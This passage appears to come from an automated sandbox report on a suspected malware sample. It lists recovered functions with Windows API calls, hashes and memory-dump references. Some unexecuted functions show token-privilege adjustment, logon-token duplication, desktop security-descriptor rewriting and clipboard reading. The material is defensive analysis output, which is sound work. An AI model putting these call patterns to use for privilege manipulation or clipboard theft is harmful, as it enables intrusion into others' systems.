                                                                                                                                                                                                                                                                                                          • Instruction ID: b6182de166c79d500846ebd2b9b8470bfad0a036e1966360992f1227e3339b48
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dae79fd4dbeb276d774f0657ef8640e9278931b6b5c47114c3c065daec63be06
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4E02232600A20E6DB303772AC09F5B3A4DEF013A1F1A0161FC359A491CF30CE6082E2
                                                                                                                                                                                                                                                                                                          Function 001366E7 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                          • Opcode ID: 830de41a56f5c7e7817c50a97b9c95962751d31cec88810118cc14e2bf2f9579
                                                                                                                                                                                                                                                                                                          • Instruction ID: fea7f605fc6b7d55f64026b90766a8cdb206595923c0baec9822f6af84677383
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 830de41a56f5c7e7817c50a97b9c95962751d31cec88810118cc14e2bf2f9579
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 56F0A9B0400702DFCB388F60D8A0812BBF0BF1032A364C93EE1DA86610C7719884CF10
                                                                                                                                                                                                                                                                                                          Function 00186AD5 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ClearVariant
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1473721057-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 775506cd4b4872fce14421c678f3e3a13394615ea5ff6451998daa759b8d86af
                                                                                                                                                                                                                                                                                                          • Instruction ID: 3bd31c1392f993ae4e8269c1096a767177548ac8a50a404a6f02aa44506a4753
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 775506cd4b4872fce14421c678f3e3a13394615ea5ff6451998daa759b8d86af
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 84F02B71704601BAD734ABB4D8157B1F7E8BB10319F104A1ED4D9C3181C7B244D49B52
                                                                                                                                                                                                                                                                                                          Function 0013684A Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: __fread_nolock
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2638373210-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                                                                                                                                                          • Instruction ID: e00fecff38c3ab8b819b39a2ff64dfccf980f6f2eb9d5c9ad734c48b1fa1532a
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42F0F87550020DFFDF09DF90C941E9E7BB9FB18318F208485F9159A151C376EB21ABA1
                                                                                                                                                                                                                                                                                                          Function 00133907 Relevance: 1.5, APIs: 1, Instructions: 24windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00133963
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: IconNotifyShell_
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1144537725-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 752a0917d8ffdf2cb6fc07e876a6feb0ddefb1e228ecb3ea8e501149ec89e6ab
                                                                                                                                                                                                                                                                                                          • Instruction ID: f2858f50469a1c2b6c7fa43360f615f9419dafa2768939b31226fe94dd5d9515
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 752a0917d8ffdf2cb6fc07e876a6feb0ddefb1e228ecb3ea8e501149ec89e6ab
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DEF03771914314DFE7529F24EC4D7957BBCA70170CF0040E6A64496182D774578CCF51
                                                                                                                                                                                                                                                                                                          Function 00133A57 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00133A76
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00138577: _wcslen.LIBCMT ref: 0013858A
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: LongNamePath_wcslen
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 541455249-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 9d0f504042a36341ddc769c048de98585652df8a8fb19b2b8f91bc3acd297011
                                                                                                                                                                                                                                                                                                          • Instruction ID: 2dd35f059acc50d520486fc4859bfa56736644af1c5cdfdf958101957f20210e
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9d0f504042a36341ddc769c048de98585652df8a8fb19b2b8f91bc3acd297011
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BBE0C272A002245BCB20A358AC06FEA77EDDFC87A0F0440B1FC09D7258DA70EDC08690
                                                                                                                                                                                                                                                                                                          Function 0017071A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CreateFileW.KERNEL32(00000000,00000000,?,00170A84,?,?,00000000,?,00170A84,00000000,0000000C), ref: 00170737
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: a68ed3e8418b620d34a63d52d905c6cf3800747759e83b0d4aecc1ab9553ac28
                                                                                                                                                                                                                                                                                                          • Instruction ID: d16780a3dfde71a70292603cc450d70eb6c9dee40f84fbb1d76bac971a2a84b1
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a68ed3e8418b620d34a63d52d905c6cf3800747759e83b0d4aecc1ab9553ac28
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E0D06C3200010DBBDF029F85ED06EDA3FAAFB48714F014010BE1856020C732E861AB91
                                                                                                                                                                                                                                                                                                          Function 0019EAB0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(?,0019D840), ref: 0019EAB1
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 221847e3f3ecc8b8c833bb02120cd3238dd74999e4ef9001aa4675602c421e42
                                                                                                                                                                                                                                                                                                          • Instruction ID: 63498c0e20d26f783b5e8227c436d74b76fd088c053fedd8e31749e80d6a3c1b
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 221847e3f3ecc8b8c833bb02120cd3238dd74999e4ef9001aa4675602c421e42
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3EB0923480060005AD284A38AA0A999378179423A57DC1BC0E479864F2C339D86FA950
                                                                                                                                                                                                                                                                                                          Function 001A664C Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0019DC54: FindFirstFileW.KERNEL32(?,?), ref: 0019DCCB
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0019DC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 0019DD1B
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0019DC54: FindNextFileW.KERNELBASE(00000000,00000010), ref: 0019DD2C
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0019DC54: FindClose.KERNEL32(00000000), ref: 0019DD43
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 001A666E
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2191629493-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: cfe1635a0f25239c35272af6c429aaa36143237ff66f7f307a07ad36c5e60330
                                                                                                                                                                                                                                                                                                          • Instruction ID: 0ee3c8952ca9debad699981137ff3fed6763a1b7726708fe463b005ee86aa583
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cfe1635a0f25239c35272af6c429aaa36143237ff66f7f307a07ad36c5e60330
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F3F08C762046009FDB10EF59D845BAEBBE5AFA8720F088419F9098B392CB74BC01CB90

                                                                                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                                                                                          Function 00191B4D Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00192010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0019205A
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00192010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00192087
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00192010: GetLastError.KERNEL32 ref: 00192097
                                                                                                                                                                                                                                                                                                          • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00191BD2
                                                                                                                                                                                                                                                                                                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00191BF4
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00191C05
                                                                                                                                                                                                                                                                                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00191C1D
                                                                                                                                                                                                                                                                                                          • GetProcessWindowStation.USER32 ref: 00191C36
                                                                                                                                                                                                                                                                                                          • SetProcessWindowStation.USER32(00000000), ref: 00191C40
                                                                                                                                                                                                                                                                                                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00191C5C
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00191A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00191B48), ref: 00191A20
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00191A0B: CloseHandle.KERNEL32(?,?,00191B48), ref: 00191A35
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                                                                                                                                                                                                                                          • String ID: $default$winsta0
                                                                                                                                                                                                                                                                                                          • API String ID: 22674027-1027155976
                                                                                                                                                                                                                                                                                                          • Opcode ID: 4a8d4115bad14160b4496899df2617f9e61d7491744580bd6af4c9731fa1ac2f
                                                                                                                                                                                                                                                                                                          • Instruction ID: ac2d2fea6ff95592085c0859420275dedbe904f0ddef37e56c0be3e5bee5ab1c
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a8d4115bad14160b4496899df2617f9e61d7491744580bd6af4c9731fa1ac2f
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BA81577190120ABBDF119FA4DC49FEE7FB9EF08304F184129F915A62A0D775CA95CB60
                                                                                                                                                                                                                                                                                                          Function 001914AE Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00191A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00191A60
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00191A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,001914E7,?,?,?), ref: 00191A6C
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00191A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,001914E7,?,?,?), ref: 00191A7B
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00191A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,001914E7,?,?,?), ref: 00191A82
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00191A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00191A99
                                                                                                                                                                                                                                                                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00191518
                                                                                                                                                                                                                                                                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0019154C
                                                                                                                                                                                                                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 00191563
                                                                                                                                                                                                                                                                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 0019159D
                                                                                                                                                                                                                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 001915B9
                                                                                                                                                                                                                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 001915D0
                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000008), ref: 001915D8
                                                                                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 001915DF
                                                                                                                                                                                                                                                                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00191600
                                                                                                                                                                                                                                                                                                          • CopySid.ADVAPI32(00000000), ref: 00191607
                                                                                                                                                                                                                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00191636
                                                                                                                                                                                                                                                                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00191658
                                                                                                                                                                                                                                                                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0019166A
                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00191691
                                                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00191698
                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001916A1
                                                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 001916A8
                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001916B1
                                                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 001916B8
                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 001916C4
                                                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 001916CB
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00191ADF: GetProcessHeap.KERNEL32(00000008,001914FD,?,00000000,?,001914FD,?), ref: 00191AED
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00191ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,001914FD,?), ref: 00191AF4
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00191ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,001914FD,?), ref: 00191B03
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 4175595110-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: c58ec4a6050fdb381eeaca3cb031a3d9509e9cd08241c39e45fee4e582f2975f
                                                                                                                                                                                                                                                                                                          • Instruction ID: 2b4959deb9a062c142a6d9a37771d89d738da55427ae9820e87eda1f144dcef3
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c58ec4a6050fdb381eeaca3cb031a3d9509e9cd08241c39e45fee4e582f2975f
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C713BB2D0020ABBDF109FA5EC44FAEBBB8BF04350F1A4525F915A7190D771D985CBA0
                                                                                                                                                                                                                                                                                                          Function 001AF55C Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • OpenClipboard.USER32(001CDCD0), ref: 001AF586
                                                                                                                                                                                                                                                                                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 001AF594
                                                                                                                                                                                                                                                                                                          • GetClipboardData.USER32(0000000D), ref: 001AF5A0
                                                                                                                                                                                                                                                                                                          • CloseClipboard.USER32 ref: 001AF5AC
                                                                                                                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 001AF5E4
                                                                                                                                                                                                                                                                                                          • CloseClipboard.USER32 ref: 001AF5EE
                                                                                                                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 001AF619
                                                                                                                                                                                                                                                                                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 001AF626
                                                                                                                                                                                                                                                                                                          • GetClipboardData.USER32(00000001), ref: 001AF62E
                                                                                                                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 001AF63F
                                                                                                                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 001AF67F
                                                                                                                                                                                                                                                                                                          • IsClipboardFormatAvailable.USER32(0000000F), ref: 001AF695
                                                                                                                                                                                                                                                                                                          • GetClipboardData.USER32(0000000F), ref: 001AF6A1
                                                                                                                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 001AF6B2
